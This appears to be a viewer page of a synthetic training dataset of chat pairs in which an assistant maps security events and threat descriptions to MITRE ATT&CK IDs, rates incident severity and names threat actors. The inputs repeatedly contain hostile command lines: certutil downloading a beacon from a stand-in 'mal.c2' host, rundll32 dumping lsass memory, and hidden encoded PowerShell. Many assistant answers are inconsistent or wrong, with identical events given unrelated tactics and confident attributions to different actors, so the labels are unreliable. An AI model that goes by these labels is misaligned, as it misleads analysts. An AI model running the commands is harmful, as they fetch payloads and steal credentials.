messages
listlengths
2
2
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.140.231.25", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.167.73.156", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-R9EZANZ0P7)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Impact", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 899 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.43.211.38", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0011\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: down_new has the ability to detect anti-virus products and processes on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This file is written to the following file path: % TEMP%\\Update.~tmp After the file is written, it is then copied to a filename of ’winhelp.cpl’ in the directory that was initially chosen", "role": "user" },...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.12.175.225", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0007\", \"TA0010\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: LockerGoga has been observed changing account passwords and logging off current users.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1531\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.69.156.126", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0040\"], \"techniques\":...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.81.91.201", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0001\"], \"techniques...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-QEHXP23RVY)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1199 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3636 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003.003\", \"T100...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.84.89.44", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0006\", \"TA0007\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1863 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.21.152.214", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.129.115.235", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-FHCUMF05VV)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement, Initial Access", "role": "user" }, { "content": "{\"se...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-DDSMLKUGFB)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-58GP7P70JF)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Command and Control, Reconnaissance", "role": "user" }, ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.46.33.211", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-KQ8EAABXKK)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-ZVQNTWCXDR)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Extreme\", \"b...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2028 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.160.4.88", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-DIJPP2ZVC7)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Discovery", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: For operations incorporating social engineering, the utilization of an online persona may be important.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1586.001\", \"T158...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Flagpro has dropped an executable file to the startup directory.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "role": "assist...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1638 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.191.132.233", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Shamoon decrypts ciphertext using an XOR cipher and a base64-encoded string.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.152.62.132", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0043\", \"T...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.114.79.37", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2155 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.63.49.172", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0005\"], ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: StrongPity has encrypted C2 traffic using SSL/TLS.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-H0BYSKLBML)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery, Persistence", "role": "user" }, { "content": "{\"severity...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.50.156.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0008\"], \"technique...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Token theft can also occur through social engineering, in which case user action may be required to grant access.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1528\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2882 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SUNBURST used Rundll32 to execute payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.011\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-9QFMK5O85O)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 683 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.68.112.171", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1059.001...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", "role": "user" }, { "content": "{\"tactics...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell co...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2576 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.179.116.190", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.00...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Koadic can download files off the target system to send back to the server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.7.236.178", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0040\"], \"techniques\": [\"T1021.006...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-NNN6BEGF4T)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Discovery, Credential Access", "role": "user"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-R86OLMUNG3)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Command and Control, Discovery", "role": "use...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-E7PS0M1TPK)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection, Discovery", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-CYRNNVVIXL)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Extreme\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Dok prompts the user for credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.002\", \"T1056\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Establishing a persona on social media may require development of additional documentation to make them seem real.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1585\", \"T1585.001\"]}",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3561 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-CEOPQZ62MA)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Credential Access", "role": "user" }, { "content": "{\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Exaramel for Linux uses HTTPS for C2 communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials.", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The configuration blob is encoded using a simple single-byte XOR scheme", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2409 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.142.180.47", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0009\"], \"techniqu...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: MarkiRAT can retrieve the victim’s username.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: InstallUtil may not be necessary within a given environment.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-PVJXR1VVIK)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Credential Access", "role": "user" }, { "co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: DRATzarus's dropper can be packed with UPX.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Consider reducing the default BITS job lifetime in Group Policy or by editing the JobInactivityTimeout and MaxDownloadTime Registry values in HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\BITS.", "...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Sowbug has used command line during its intrusions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2372 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.132.204.237", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"tech...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-NRN3SH5O1I)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"High\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-VTHYFDO0KN)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"severit...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1853 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The recovered encrypted data may be vulnerable to offline Password Cracking attacks similarly to Kerberoasting and expose plaintext credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.002\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-8EKX2BOHZ0)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Collection", "role": "user" }, { "con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.42.145.118", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T10...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The following commands are supported by the malware: Command ID Description 00 00 00 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe 00 00 01 Deletes the files:...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.89.42.239", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0008\", \"TA0007\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}", "role": "assistant" }...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 689 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.133.84.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0009\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered S...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-STU5YWLC8P)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-5BGED36CH9)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access, Initial Access", "role": "user" }, { "content": "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-JH83ERM6AZ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement, Exfiltration", "role": "user" }, { "content": "{\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: smb and exploit in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1210\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-YV41VFPHXA)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Execution", "role": "user" }, { "content": "{\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.104.158.225", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \...